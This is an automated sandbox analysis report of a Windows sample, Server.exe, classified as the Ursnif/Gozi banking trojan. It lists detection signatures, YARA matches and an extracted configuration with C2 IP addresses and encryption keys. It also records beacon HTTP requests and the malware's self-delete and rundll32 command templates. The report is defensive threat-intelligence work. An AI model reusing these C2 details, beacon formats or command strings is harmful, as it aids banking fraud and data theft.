Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Server.exe

Overview

General Information

Sample Name:Server.exe
Analysis ID:830522
MD5:9565b4a15a8593ea3ec1f3c9d0a2e11a
SHA1:0954c5387395f0552fa56f5b06b3bb159f0d430b
SHA256:3aa75da2773573786f07530f5a09b8e0aacd0402fd11e14d8067b5f4607bbd6a
Tags:2502557715exegeoGoziITAUrsnif
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
Detected unpacking (changes PE section rights)
Snort IDS alert for network traffic
Writes or reads registry keys via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Found evasive API chain (may stop execution after checking system information)
Writes registry values via WMI
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • Server.exe (PID: 5744 cmdline: C:\Users\user\Desktop\Server.exe MD5: 9565B4A15A8593EA3EC1F3C9D0A2E11A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Gozi, Ursnif2000 Ursnif aka Snifula2006 Gozi v1.0, Gozi CRM, CRM, Papras2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)-> 2010 Gozi Prinimalka -> Vawtrak/NeverquestIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.gozi
{"RSA Public Key": "ScCjtIu/chsReaToemavuPsGfYIczuvCBclhySG8/AhfUJMnvau4hmaBPIAXScUh9/secJMcCpqd5yeayd2fJdEc3ETZJfeY55SskXGIyxmn6sJL8WH2YF95GitV+tnd52epRBd8/snxdFtGg4Pgf9kxQsW/ySpD96hQxlGzGgDApS0E54E54SLEBTqihX3FWN2//mDaDIJuoFz7lt0whvCg/8gXPBf/s2nkXoRwyyqXguvwDcw9IZEu1NT1qqIwpXL9DGldaMvwfXTGOLIkQX35RsJJDpP1V5Mcgc+c1nBRPKqGQz+NUtKDBiyp0RXMK3jDdMGWvimLl80kvMkvSd8fQXtWRcZ7DCuQwrQxkXo=", "c2_domain": ["checklist.skype.com", "62.173.142.81", "193.233.175.113", "109.248.11.184", "212.109.218.26", "185.68.93.7"], "botnet": "7715", "server": "50", "serpent_key": "xeaLJj1BwSDpjIfH", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.513518394.00000000004E6000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x5a70:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0x1228:$a1: /C ping localhost -n %u && del "%s"
    • 0xea8:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xf00:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xa9c:$a5: filename="%.4u.%lu"
    • 0x63a:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x876:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xbb7:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe6d:$a9: &whoami=%s
    • 0xe56:$a10: %u.%u_%u_%u_x%u
    • 0xd63:$a11: size=%u&hash=0x%08x
    • 0xb1d:$a12: &uptime=%u
    • 0x6fb:$a13: %systemroot%\system32\c_1252.nls
    • 0x1298:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xb54:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x63a:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xa68:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xcf2:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd96:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1cc0:$a9: Software\AppDataLow\Software\Microsoft\
    Click to see the 27 entries
    No Sigma rule has matched
    Timestamp:192.168.2.6193.233.175.11349705802033204 03/20/23-13:15:36.320401
    SID:2033204
    Source Port:49705
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.662.173.142.8149704802033203 03/20/23-13:15:16.126464
    SID:2033203
    Source Port:49704
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:192.168.2.662.173.142.8149704802033204 03/20/23-13:15:16.126464
    SID:2033204
    Source Port:49704
    Destination Port:80
    Protocol:TCP
    Classtype:A Network Trojan was detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: Server.exeReversingLabs: Detection: 35%
    Source: Server.exeVirustotal: Detection: 46%Perma Link
    Source: Server.exeJoe Sandbox ML: detected
    Source: 0.2.Server.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
    Source: 00000000.00000002.513886233.00000000027F9000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "ScCjtIu/chsReaToemavuPsGfYIczuvCBclhySG8/AhfUJMnvau4hmaBPIAXScUh9/secJMcCpqd5yeayd2fJdEc3ETZJfeY55SskXGIyxmn6sJL8WH2YF95GitV+tnd52epRBd8/snxdFtGg4Pgf9kxQsW/ySpD96hQxlGzGgDApS0E54E54SLEBTqihX3FWN2//mDaDIJuoFz7lt0whvCg/8gXPBf/s2nkXoRwyyqXguvwDcw9IZEu1NT1qqIwpXL9DGldaMvwfXTGOLIkQX35RsJJDpP1V5Mcgc+c1nBRPKqGQz+NUtKDBiyp0RXMK3jDdMGWvimLl80kvMkvSd8fQXtWRcZ7DCuQwrQxkXo=", "c2_domain": ["checklist.skype.com", "62.173.142.81", "193.233.175.113", "109.248.11.184", "212.109.218.26", "185.68.93.7"], "botnet": "7715", "server": "50", "serpent_key": "xeaLJj1BwSDpjIfH", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
    Source: C:\Users\user\Desktop\Server.exeCode function: 0_2_02021508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_02021508

    Compliance

    barindex
    Source: C:\Users\user\Desktop\Server.exeUnpacked PE file: 0.2.Server.exe.400000.0.unpack
    Source: Server.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\Server.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

    Networking

    barindex
    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49704 -> 62.173.142.81:80
    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49704 -> 62.173.142.81:80
    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49705 -> 193.233.175.113:80
    Source: Joe Sandbox ViewASN Name: SPACENET-ASInternetServiceProviderRU SPACENET-ASInternetServiceProviderRU
    Source: Joe Sandbox ViewASN Name: REDCOM-ASRedcomKhabarovskRussiaRU REDCOM-ASRedcomKhabarovskRussiaRU
    Source: global trafficHTTP traffic detected: GET /drew/vtZ_2FDIi/MRLim5q_2FPOOIVwJV5p/mDG55l02bkwr36hqtHV/_2BXyU_2BkyUgVl9WIyeMc/2k07Y9nJ9nLtT/PcL77Drj/unLXMitiTeAgURShweMUOiB/jO6Gh6u4qj/R0YL8nr8_2Fe_2F8S/NmYC2zbFo_2F/_2F9OVp7R5L/glgHLP7bYaSidB/FZsufB1rfZCbhP2GWCC1X/tQ2Xe4zo9AyYJ7HA/jNvemogj1MfecHx/YKLEAqQON4Cy4b59f3/zq6LmLb43/Vud6lYhHL1LCLqJWQEpj/MZMy2z9wXkXjHl/Y_2BX.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 62.173.142.81Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /drew/qHKukbBQWu/Xw77sqXTqtrxRWpPD/yl9MR0Y2eNmn/GbsfhYjdl8H/5GaIgAKgHB90sh/aMn4M6bKKJciYELDTreaM/i8dqMbDS0rDZpO_2/F2s0PNMupq8bNg2/sWxA9_2FGI7DvJntWq/sJDzxIUTO/r8bT3UibSNEQXXaTJdFi/yG6uB8JAsWc6GRKrJig/fWv9nw4MT1weBq8HJPcdl7/ZF86bHFVi_2FJ/yinUV20K/IPPC4VuFn7ORSOMnH_2FY6_/2FwmfjECDI/_2B41PRFw9jRfkH5W/0EbKz9E3ebE/0M10.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 193.233.175.113Connection: Keep-AliveCache-Control: no-cache
    Source: unknownDNS traffic detected: query: checklist.skype.com replaycode: Name error (3)
    Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.81
    Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.81
    Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.81
    Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.81
    Source: unknownTCP traffic detected without corresponding DNS query: 62.173.142.81
    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.175.113
    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.175.113
    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.175.113
    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.175.113
    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.175.113
    Source: unknownTCP traffic detected without corresponding DNS query: 193.233.175.113
    Source: Server.exe, 00000000.00000002.513863268.00000000023BC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://193.23
    Source: unknownDNS traffic detected: queries for: checklist.skype.com
    Source: global trafficHTTP traffic detected: GET /drew/vtZ_2FDIi/MRLim5q_2FPOOIVwJV5p/mDG55l02bkwr36hqtHV/_2BXyU_2BkyUgVl9WIyeMc/2k07Y9nJ9nLtT/PcL77Drj/unLXMitiTeAgURShweMUOiB/jO6Gh6u4qj/R0YL8nr8_2Fe_2F8S/NmYC2zbFo_2F/_2F9OVp7R5L/glgHLP7bYaSidB/FZsufB1rfZCbhP2GWCC1X/tQ2Xe4zo9AyYJ7HA/jNvemogj1MfecHx/YKLEAqQON4Cy4b59f3/zq6LmLb43/Vud6lYhHL1LCLqJWQEpj/MZMy2z9wXkXjHl/Y_2BX.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 62.173.142.81Connection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /drew/qHKukbBQWu/Xw77sqXTqtrxRWpPD/yl9MR0Y2eNmn/GbsfhYjdl8H/5GaIgAKgHB90sh/aMn4M6bKKJciYELDTreaM/i8dqMbDS0rDZpO_2/F2s0PNMupq8bNg2/sWxA9_2FGI7DvJntWq/sJDzxIUTO/r8bT3UibSNEQXXaTJdFi/yG6uB8JAsWc6GRKrJig/fWv9nw4MT1weBq8HJPcdl7/ZF86bHFVi_2FJ/yinUV20K/IPPC4VuFn7ORSOMnH_2FY6_/2FwmfjECDI/_2B41PRFw9jRfkH5W/0EbKz9E3ebE/0M10.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 193.233.175.113Connection: Keep-AliveCache-Control: no-cache

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Source: Yara matchFile source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: Server.exe PID: 5744, type: MEMORYSTR

    E-Banking Fraud

    barindex
    Source: Yara matchFile source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: Server.exe PID: 5744, type: MEMORYSTR
    Source: C:\Users\user\Desktop\Server.exeCode function: 0_2_02021508 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_02021508

    System Summary

    barindex
    Source: 00000000.00000002.513518394.00000000004E6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: Process Memory Space: Server.exe PID: 5744, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
    Source: Process Memory Space: Server.exe PID: 5744, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
    Source: C:\Users\user\Desktop\Server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
    Source: C:\Users\user\Desktop\Server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
    Source: C:\Users\user\Desktop\Server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
    Source: C:\Users\user\Desktop\Server.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
    Source: C:\Users\user\Desktop\Server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
    Source: C:\Users\user\Desktop\Server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
    Source: C:\Users\user\Desktop\Server.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
    Source: Server.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000000.00000002.513518394.00000000004E6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
